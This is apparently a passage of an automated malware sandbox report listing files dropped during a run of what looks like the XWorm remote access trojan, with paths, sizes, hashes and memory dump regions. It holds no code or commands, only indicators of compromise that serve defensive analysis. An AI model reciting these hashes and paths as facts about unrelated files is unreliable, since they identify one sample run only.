5923db1d102f99d0b29d60916b183b92e6be12cc55733998d3da36d796d6158c76e385cef320ec0e9afa242a42bfb596f7233b60b548f719f7d41cb8f404e73c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

Filesize
23KB

MD5
efe81e4daef615b00dbe73ce495ca572

SHA1
efa6284b26573a32770851c3ccfc54de3d6642d2

SHA256
8a2115d91ed4df1f74c0bff1d7800c6c776fed3addf7e6ce4637a1bd0c9f81be

SHA512
a561f8475dc2ec744dad499bfdb45b5c113a216d93c3873321e9fbbf22dfdde932af4dedd5819f4f4e0c8bd614efb77e68825561aaf05ec69c19df6eb7271b06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
9589c328ad7610134a4ecae0336713ab

SHA1
db04d09d259ad23b7d4d324a02a3386427963701

SHA256
b2c1aeb90a2560e0cda538422e2e9ef2f5c10b900da7ab502297f9862539100a

SHA512
3c7f8e50889134e8c801a54ee6d828d579d15f8cfcac5a18cda2ccc72315cdc70c93d218d9ea5048a68fec595599a0c4ae36fc7778e9afd9a6bfb567ff5cdecb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
b2fd6917ac08a6e930aa98a285075a25

SHA1
d32455a595df40903313a87d7719fef393e15ab3

SHA256
a5b9c7e58ab3aea03892d3dcb8690afe840b76220526cddb01b0a96bfe11eba1

SHA512
736b40bdf6a1f106973606bcf94094e16626517feaf47b4f20b5617b04527c73727a858f7b499f42be1699b092851ac8bc9c0ea82d9f361d294a5628f7473895

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
18a6a0e438d5d88096b4b3bffd9f95ca

SHA1
4fe9825f25a90aff5381e72c4efc565589cd9b9b

SHA256
44bde56ecb9157b7309ee2ec8f993d5bde8691bce195fc0f88793f40e4758060

SHA512
a26bc88af978490ae3454db3fb33fc3a1a687f8568e388478255fa573afe2b441ef8ac4b855f28f33584afa857e09f47d76192be739845a67c5f3d772813bf8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b0ec6b0317ad87f4780e7049fd288f5d

SHA1
356cc76d19c88dccc98b7af9ed04e0d55ed67265

SHA256
e563c8f601877c370c90a49fddf5ac489f50e41233c82b6dd0a4d6c1cb9b9bc3

SHA512
2d10487566aa56e02ec5cb89937c43a88f1357becef82438a5fbd4d2110b97118e7c8243a40d48fcae886457845a8c6582e847ac207a77f3c2136ba976e12a30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
551adbc65c117e8d37d7dff86f87d751

SHA1
7bae2f8f7d8ad366114e8d4cea8e4376d7a513bd

SHA256
d17918dad074081ee8abaad3d7563e54101c5856026aeb38214f1e0cea1b396e

SHA512
1566a80b63258f76cd24b6b7fbff9ec27b6d42d4c37add8448e24301a04a2252c01a757d80e5f87501770734bb41568cd9754569cc0b50c7abcf91f9464e146e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c374e71753cc60a1600a0d8c29dc78e5

SHA1
3fc9ea8d162978e1942d8cbfbd5748d46348a629

SHA256
5f6996661b461097d152c6474cd1f05dabd4d7b609d70cf3eb2484ea6115a4ee

SHA512
9b5128949d6863dffb858351dd807b648ec391847fd1afe68a9a078cbd32d6f31cf663702f38edbbac4382754e5844bcdde254b99a666150d7417f87383fcec3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
39c9bb41dd11f33edec6ee2b46f85d74

SHA1
74080346a8735c5f1c35bdf8802731e123f06c29

SHA256
c7f6997a1aeb1c557f6a557dd2b8ef19d5f20a7a16808c2b4e426e9ae05eeb2f

SHA512
e9c0cb7f80efecfc3c075e3fa3784da95f10052076047db6a5fdb0fe51d274e627de9a84cfe2746e023e5026979a00f46693eec2feea21634fe5462bae5a1845

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
b96d7037a88e2df8339fa360f1eafec1

SHA1
adf8f27fe0d3f4077438d6dd65071b1d874842bd

SHA256
f4cd961942773262f9cebe614337a406d652f6038bb27a8bb619d5256afbe233

SHA512
5b3ca247edfec3775a083f7d7684216e271b489dfca8988b6c9ec3a5b02aef5256628fe3b26ae7322f1154e468763d08b4f9ad221768ecb6372c8bd345de4be6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
467bd84befde99fc85fafb3e859bc5cc

SHA1
9b7020f2106d68104e8556726bc37e10ad95dbcd

SHA256
339b33c6c12f99b017b53348f6ac375a27d9c2a67fbda0c1ebf976f47df3682d

SHA512
0c35b529b352f12cf8ab4f5c9cd79573aa550134982ae2a950996565a99fed07471b402b8539f15e538da63294253b531e94d72a8949565874490828e2ca3500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
74b70f806e34297a2bd54234abb065a5

SHA1
b818cc5ca015b7b8be99f61086f8f9ae147a1f86

SHA256
43fe9d77dd42639cb2ab4da29a20aa4913558294faa8e0c8ad887d66225a4b1d

SHA512
21c57837fa6042ffa2c6f6264f72141c765272bb5dd8fbe9f2109387e65511f14b65e7fdbbf222a7d8442fe8e9d0138ffbfd9404a0a7abbe486c2acfdb0ab021

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
4de5ee4274c2aea37282489e8ab5dc7a

SHA1
b9b893bf53ef69044e87afd38039f38f1831dbef

SHA256
2f0c043668b9ed3c0d35c333f9089840efb9d6e1d4bf76979ab7583e77b4684f

SHA512
b41a44c4e561cc27ab90f4d2a9d799ea7e2c8c0ef170f0318272562707db0bd6f7f13fed5ce3ec6ceaceb280f8b5598c25e726ac4dcc039baff0465fe5ce9506

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
8bfff83625548ec025cf714b9a8d8b6f

SHA1
05ee7126ad7bb13e1474e40f9aef7c59cab2dfa2

SHA256
97d244d84c1886b1d5270c6d301c69716019c5891d539d86fb97fd5343aad8bf

SHA512
d991aab4ef4bfd40335e9ad57f58955b5541e12c744b07a23f276fd57cb4348b59ce9564d601edcc6b6905d1401956538664490a720ef59a09e9b5eabbafd430

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
825d45dc55f0027c86bae026c44daf6a

SHA1
7d9b0e4ff55a78c7172d708da78dbb50ff664f13

SHA256
f43b015259dd72cb29dfe57c91f8ae8ac78249d3bf92e43651e708a11b9fe8c1

SHA512
0df2fd68318493ee6863da23d43345e54aad0bf7c9ddb7d797443f3c33203de98040ee0f2ad0a39054807a26a62895db6eafea2bb5415295c1a47947750269b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
84beaac98b02b4c65c5f77866b44712e

SHA1
a3f509548cb36919b5fe715cc003ddda892a4408

SHA256
6855efe8c13fa52465131d52874febdc0424f59fb7561ad7bf44b45cac36d256

SHA512
162749bd9a94974406c272a29d5dc8ec4485973ba489806443064e35d84b11c337babd0d5aa1c514c780155ec86f46701ced04c469d4f9c42715b1c88de89867

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
e8eaa104aae84fda594fd25ab377640c

SHA1
838ad4c17a3a6d3943a6c6f7e11650ce3a7367e7

SHA256
70b0ac189108e94ab18e7d488cc37f357a57c7369437625b07bd93e563d738f4

SHA512
36d1463d12d3a79b46f88a99dd02e67c86dcf730c582e45060ecb00df56cef4893dc2ff6d6739bf6660891f56c4419b3651475d3425f7db52d8b416e6ef7079d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
d14086a73b4d913bb158f12913810929

SHA1
0401d32f42b602f7c745a5dfcbc68794a7387e01

SHA256
3a256089f43b1b56fdd06c0826660ff1e5f53a4a222940b167dd52dca0e67d6b

SHA512
d6076ed0a8460fb47c4ea908d9a053e51f2805dad6d2c4cb4b9225c88370d8e14db4b77c794286254e7994fb8dcf214b5a3a654e09564801082cdb8fac5793fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5791a1.TMP

Filesize
1KB

MD5
84fa33145f052c425579fe36e2c9bbe2

SHA1
e7295befcd524bf943f33140cf1c8b2880a722c8

SHA256
7492a3b062e95af27b8442c5eceb3b45e61c59e5eb08d863fd0a86cb3ea45e16

SHA512
eaea9f6d040af3f1f31ba9e826dfac6909313f5441411bacad06e9fa5edccd6e12a20426bad905f0857f6deee34f226943fac976c6f95a9602f969c94d7143ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b69554d2f69dd7f4c060693eca4285c6

SHA1
be2b68490bb72163f1fdfab354eca0df64a121c6

SHA256
ef7cdf05189cbdc435c637ab09dcf3acd76ffec970012e6bd8440fcbd30d29b4

SHA512
ffe6d7b8ea5d8f7625d1d20b1e5bb84d276751be98fe9355d229bc70ed212a5cf3f354f6623cc92db083ca3d5fe772e40f9a06fe29f3f242093b2574a041e8da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5428cff71a04aa3b8047cdd67ad454e1

SHA1
e7f1d7d4e220d34efdbe0b182e9972c98b8c81bf

SHA256
7af2cd8518aa742c2a6c59e91208b6be3fe03b2d6aebca48006a91d052d6720a

SHA512
22c4c2ef4c8ce21a5b075bd898357427f80fe4b3a9ff59f30541957152dc1a0d05f5fe4d990be7f1c9440f9cda7db09fb3985dbe14d423a11a2ca54c51c0ce54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3ca8dc8c4a78a4220b655462e6da5552

SHA1
00aa31892c376d24bee6f1b5781ef552594ddf6d

SHA256
7bcadb534f9fef8cd74019679106a7a0dd66fbf30257b5b05c96df88bf4fa5ff

SHA512
1b32176e6afb3ca0d43bd177adfda477fb0e665959b7948fc4613aa48618091fa920e9bce21ff930d4ccf3c3ca931d378573b505ae8fcf37fbead759cbdfe6cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bff398d1ed2b2884a49939f6087d65db

SHA1
28cdfd92011c80818cc8ac54175a0c21a361a977

SHA256
e5dcd8367c90a6e26f9f0c4b21b2e7c6d8b1cc7feaaf81e52d23632fcaeaffa8

SHA512
5fc59979aade8f5df1df6d0e1416e8cdd8efc0a4401cedfe65714286c0501ab2ec7ad945a17b35b77a4d3751dea95e437bb39cb1fa9a48ceb9c7f4a9946d974e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
d16842e9e6088d22cbe00a56fa0a4fbf

SHA1
50c6874c2d6a0a98dcb0bfd7fd6671980fe0fb40

SHA256
eeff8645b4074d473f2c6b0f4dff4716a5d2a4434202fbf20151a509e9e6087b

SHA512
a1d90bd85114b2f1d555842c11149f225931ac67261e3b5acd15af08ff5a1a1593ebaf4f94fd1b2f5d4062f65a5daa99c4c82ec7fc1dc4c085eba3bb04da391a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
f51ad9c74ee3f0c9e143337285bc149b

SHA1
abbe863a82f8dcdee27d13bdfe9401dbd5c2d680

SHA256
cb723e25fc56c66abba4e0114e0b88ac70d1ca1c6b3cbcf538ae4fc5d85769cb

SHA512
a4d213b2db87bd3c5474215d347f79dca09aa3e2973d3f4ab315743c97dc9d1b94bd63a839ab868ebde252d4d946faa42ef21c9d670afd966664db90bd856f57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
7bcd644d8f3d13891f13c3e3afa155b2

SHA1
ed779064344bbeec9684ff7e8314b6f144042d53

SHA256
c4dbd146ed9a71ea9bcf360d2a2bd25be7ad8f71dc7616b3f60909889441d6ee

SHA512
b7a35e39423de060b27a478a0a0e21434c79c0571322b5035ee36a4863781b273e95ff242760520a2282b0b55bfb7fdd3329351a55c54fff2ed0d327ac37d361

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
8da98c0a04158c166d5da247c4e26a5b

SHA1
7ccbe439feb0b20c3a7a2e03e63e14f9dd6e6f1d

SHA256
8eaa4f239a764049b37fa6dc4b73611fc682e6a438285d1edf676c1fde3c2f92

SHA512
6b7c087f3b76f075b776a6e43ad2574889fc8323153fa9cbe8fb4d8bdf15e6e6546d0409236d0e9a04f8700003e5930fef3fa71f2722217185c1bcf3a6def219

Download Submit
C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll

Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

Filesize
5.6MB

MD5
b8703418e6c3d1ccd83b8d178ab9f4c9

SHA1
6fb0e1e0ee5bc745f52a1c29e3cf4b88a2298dd6

SHA256
d6e9972976881d3dad7ac2a0c66cd7dd81420908aae8b00195a02fdf756cfc5e

SHA512
75ff6e911691e3d0d32c25d4b6d275a2b6157dae418ce5507f3e3f1b321c3f0dee516b7db0fd6588860019a19862f43c5335c465829de7a418a71999b71cfc3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe:Zone.Identifier

Filesize
88B

MD5
640d524e902154387c7753caa8f354cd

SHA1
f26c3bd6504c691049b70127acd4541d0bb121f5

SHA256
44343939c5c0e594f307bcb9fc79669ea0213df316d5f3b4a557afa8acf2d665

SHA512
0eab3ce3739eb6bcf5055381c6718744e743e62e0069b80afdc3710dc46c7672b469aad84c566fd48006b7e6667b5e5f223adf496052155c259126718fa1bcd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Licget.exe

Filesize
15KB

MD5
0fb684cc15d197c0b937e5528359d7c8

SHA1
7d963246f52f42012bdcddb31214283c84c954ed

SHA256
e767d70fc57483aae7a20cb094a9bfc1fd4f04e97fb772cd6892d057e5be4260

SHA512
c40335f72f802479dc0926704d87670a782362fedae5bb50179d427fc343c6a33cfe09f4640acb15624d1511d3d66f76d87f663f9ad430fc2ddb00c54056103c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD812.tmp

Filesize
1KB

MD5
793c02a2460fa247da72e6d4ab3226e5

SHA1
d8f2339b57e8529c9fbe36c28415102aefcddbd6

SHA256
0f17f2a101df83c09ef21b5e4fdf7431e6a691151086dcb83510c9d2a4c39c65

SHA512
2420a6d0532929ee90e8c31582ae9a17032f1478db2d191536021146540efed1ecb95a462d2502a9dbcd32a30f2d1bc9df7440981d06259864447117ce4671e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qxwuzak0.3gd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tox44xxt\tox44xxt.0.vb

Filesize
60KB

MD5
c2b69f49fd6aaa8811bc89f634554734

SHA1
cd737c49ed66fbe29d8bcf93abca5e769ac3e994

SHA256
d146511e7902ce86b3d164002b21127e370ca60f510acc2648a801b0c9952246

SHA512
ffc24a184ad6da521f1bf094d6f2cdc49fb6080dee06024fe5bc856f749ef2d43582a35f0e43aefceb70c4b9f7cfaed51d1d209bf732f9ea0d77ada2722b8ddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tox44xxt\tox44xxt.cmdline

Filesize
324B

MD5
0625232608e391afe5c12e328c6bbfa5

SHA1
6a9a913a88b399904e5aa413392850bdba4ef437

SHA256
51763e76d676a253de65c7d2ce269b48860e5c108eb9fa9a3295b5a9a0a2fe62

SHA512
4f4a8cc1a5c570f721c0307a220552fca1c2aec6200c350909ea615f6702d0466c54a4fe4c672814031322ef28c57955b0c8986eaf3fd329892c98005dcdd2ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbc213C188CEBD14CB4AE155A2E9FCEB5F7.TMP

Filesize
1KB

MD5
b70192bdfa82953d23893557b94122f2

SHA1
4fd73efd6a6b28f57df1dde6a4241526c5b0fb60

SHA256
6443d3bc34cc48e858c4fdb3ab0ad9a433705f266cb70f92886e90cbf589eab4

SHA512
6dcb0273ffe6675af850d0a5e1976d9e8f8e9d6306a21856b1df4d8c0fef38fb8ff28f113e8c8b923c6451e32e734c514a15f79efe6316f180874f78608928da

Download Submit
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip

Filesize
34.0MB

MD5
88dfc456336a95ffeac16d9276083b7b

SHA1
8949c8c8778bd6412a456212d4ba2707f12e9d7a

SHA256
edbdc2e1bed353b533761a069b2d9a563683318fd1657ce09f9be2fa8ccd497a

SHA512
988ec72613d155bc362b1c0e0f1ee731f9653947328084e96eb436e7576b8e9c5114e59488216ea4f05d48126c5dbd7e983a02a412755b59b961f15c3ceea5f5

Download Submit
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm.exe

Filesize
40KB

MD5
6358eeaa86aebe8e9c25656045213e4b

SHA1
8f7cf89fac99bbcb951faaa0a1fe7cf634da435f

SHA256
dc43447f1df8730a43e1d6a3ed830b0c4708c453d2dcbb055a823dfcdfc186de

SHA512
07e7d49f053b5508a245c558e5ffd55dfde9c69c3024057426cd4ddca6e3253df35cc876e5514d6ad0fe3ecabf8f66b9c69d1d5b45cfc2bc4e0e1fbb3461c39d

Download Submit
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip

Filesize
4.9MB

MD5
c29e5cac95dd0b675f226b0fcfb7fb2c

SHA1
174a1dc6aa9131f31e1be7e79422ca13d2720fb8

SHA256
96f92d251a44edad3994c0bc22bd063124fbdf0c18eae81f2a35119542546f0c

SHA512
65de4c8399601a62b67bc1c85ed202519f9131964049c00d7928402ce69074ab58f787066725c026e470fd1f02ad2066c0b8b62df655cd2c07ce49b3a3bbc877

Download Submit
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip:Zone.Identifier

Filesize
90B

MD5
3197c9f862dfa7ebe89b82b0df58b836

SHA1
a8be7128bc71fa9d6e428245418e624a6710efc1

SHA256
4b2c3ac6ec06df7da150f174098e69047b954f300f13853ba356bfa7819bb3bf

SHA512
a7d997f38647e624ca1c497e21bde6b1d372439ce702d4109aae94631cfc55a0d006c4bd070d663d98002260b0a7ee2c51f63e0f5a2e9c193ec0e53c3bc1edc1

Download Submit
C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC

Filesize
16B

MD5
7e7c3e07d37da9b398ce35a6f3d145a9

SHA1
b1b1e84a50e91c5d1c32a20620ff1b80e120b3a8

SHA256
4f37fff00413295797fa5dbcf8bed2c11083fca8e4d971f9b8bf2091a546d45c

SHA512
613ef4f95bac3521490793058b63efdc498b4b33f3420e1b91ee8a3b502e02a3308caae4931e44b4214fadbe5709cbe11a8f235cbb9b9957c840e29c0864448f

Download Submit
memory/1448-507-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/1448-506-0x0000000074040000-0x00000000747F1000-memory.dmp

Filesize
7.7MB

Download
memory/1448-545-0x00000000075E0000-0x0000000007672000-memory.dmp

Filesize
584KB

Download
memory/1448-588-0x0000000074040000-0x00000000747F1000-memory.dmp

Filesize
7.7MB

Download
memory/1448-508-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/1916-484-0x00000000023B0000-0x00000000023C0000-memory.dmp

Filesize
64KB

Download
memory/1916-499-0x0000000005CA0000-0x0000000005CEC000-memory.dmp

Filesize
304KB

Download
memory/1916-546-0x0000000007400000-0x0000000007408000-memory.dmp

Filesize
32KB

Download
memory/1916-544-0x0000000007410000-0x000000000742A000-memory.dmp

Filesize
104KB

Download
memory/1916-543-0x00000000073D0000-0x00000000073E5000-memory.dmp

Filesize
84KB

Download
memory/1916-542-0x00000000073C0000-0x00000000073CE000-memory.dmp

Filesize
56KB

Download
memory/1916-541-0x00000000073A0000-0x00000000073B1000-memory.dmp

Filesize
68KB

Download
memory/1916-540-0x0000000007350000-0x000000000735A000-memory.dmp

Filesize
40KB

Download
memory/1916-539-0x0000000008060000-0x00000000086DA000-memory.dmp

Filesize
6.5MB

Download
memory/1916-528-0x00000000023B0000-0x00000000023C0000-memory.dmp

Filesize
64KB

Download
memory/1916-529-0x00000000071C0000-0x0000000007264000-memory.dmp

Filesize
656KB

Download
memory/1916-527-0x00000000071A0000-0x00000000071BE000-memory.dmp

Filesize
120KB

Download
memory/1916-510-0x0000000073D50000-0x0000000073D9C000-memory.dmp

Filesize
304KB

Download
memory/1916-482-0x0000000002400000-0x0000000002436000-memory.dmp

Filesize
216KB

Download
memory/1916-483-0x0000000074040000-0x00000000747F1000-memory.dmp

Filesize
7.7MB

Download
memory/1916-485-0x0000000004F80000-0x00000000055AA000-memory.dmp

Filesize
6.2MB

Download
memory/1916-509-0x0000000007160000-0x0000000007194000-memory.dmp

Filesize
208KB

Download
memory/1916-505-0x0000000007430000-0x00000000079D6000-memory.dmp

Filesize
5.6MB

Download
memory/1916-502-0x0000000006DE0000-0x0000000006E76000-memory.dmp

Filesize
600KB

Download
memory/1916-503-0x0000000006110000-0x000000000612A000-memory.dmp

Filesize
104KB

Download
memory/1916-486-0x0000000004D40000-0x0000000004D62000-memory.dmp

Filesize
136KB

Download
memory/1916-504-0x0000000006160000-0x0000000006182000-memory.dmp

Filesize
136KB

Download
memory/1916-584-0x0000000074040000-0x00000000747F1000-memory.dmp

Filesize
7.7MB

Download
memory/1916-498-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

Filesize
120KB

Download
memory/1916-497-0x00000000056E0000-0x0000000005A37000-memory.dmp

Filesize
3.3MB

Download
memory/1916-488-0x00000000055B0000-0x0000000005616000-memory.dmp

Filesize
408KB

Download
memory/1916-487-0x0000000004EE0000-0x0000000004F46000-memory.dmp

Filesize
408KB

Download
memory/2292-683-0x00000000741A0000-0x0000000074951000-memory.dmp

Filesize
7.7MB

Download
memory/2292-625-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

Filesize
64KB

Download
memory/2292-624-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

Filesize
64KB

Download
memory/2292-623-0x00000000741A0000-0x0000000074951000-memory.dmp

Filesize
7.7MB

Download
memory/3008-591-0x00000000740C0000-0x0000000074871000-memory.dmp

Filesize
7.7MB

Download
memory/3008-592-0x00000000740C0000-0x0000000074871000-memory.dmp

Filesize
7.7MB

Download
memory/3008-727-0x0000000073F60000-0x0000000074711000-memory.dmp

Filesize
7.7MB

Download
memory/3008-728-0x0000000004FF0000-0x0000000005000000-memory.dmp

Filesize
64KB

Download
memory/3008-729-0x0000000004FF0000-0x0000000005000000-memory.dmp

Filesize
64KB

Download
memory/3324-715-0x000000007F2E0000-0x000000007F2F0000-memory.dmp

Filesize
64KB

Download
memory/3324-716-0x0000000074770000-0x00000000747BC000-memory.dmp

Filesize
304KB

Download
memory/3324-726-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/3324-714-0x0000000005DA0000-0x0000000005DEC000-memory.dmp

Filesize
304KB

Download
memory/3324-704-0x00000000057A0000-0x0000000005AF7000-memory.dmp

Filesize
3.3MB

Download
memory/3324-703-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/3324-702-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/3324-701-0x0000000073F60000-0x0000000074711000-memory.dmp

Filesize
7.7MB

Download
memory/3324-725-0x0000000007280000-0x0000000007324000-memory.dmp

Filesize
656KB

Download
memory/3488-1128-0x0000000072CD0000-0x0000000072D5A000-memory.dmp

Filesize
552KB

Download
memory/3820-680-0x00000000741A0000-0x0000000074951000-memory.dmp

Filesize
7.7MB

Download
memory/3820-604-0x0000000005FA0000-0x00000000062F7000-memory.dmp

Filesize
3.3MB

Download
memory/3820-634-0x0000000008430000-0x0000000008441000-memory.dmp

Filesize
68KB

Download
memory/3820-594-0x0000000005060000-0x0000000005070000-memory.dmp

Filesize
64KB

Download
memory/3820-612-0x0000000073D50000-0x0000000073D9C000-memory.dmp

Filesize
304KB

Download
memory/3820-622-0x0000000007A40000-0x0000000007AE4000-memory.dmp

Filesize
656KB

Download
memory/3820-613-0x000000007F530000-0x000000007F540000-memory.dmp

Filesize
64KB

Download
memory/3820-644-0x0000000008450000-0x0000000008465000-memory.dmp

Filesize
84KB

Download
memory/3820-595-0x0000000005060000-0x0000000005070000-memory.dmp

Filesize
64KB

Download
memory/3820-593-0x00000000741A0000-0x0000000074951000-memory.dmp

Filesize
7.7MB

Download
memory/4216-699-0x0000000073F60000-0x0000000074711000-memory.dmp

Filesize
7.7MB

Download
memory/4216-700-0x0000000073F60000-0x0000000074711000-memory.dmp

Filesize
7.7MB

Download
memory/4628-481-0x0000000074040000-0x00000000747F1000-memory.dmp

Filesize
7.7MB

Download
memory/4628-479-0x0000000074040000-0x00000000747F1000-memory.dmp

Filesize
7.7MB

Download
memory/4628-478-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download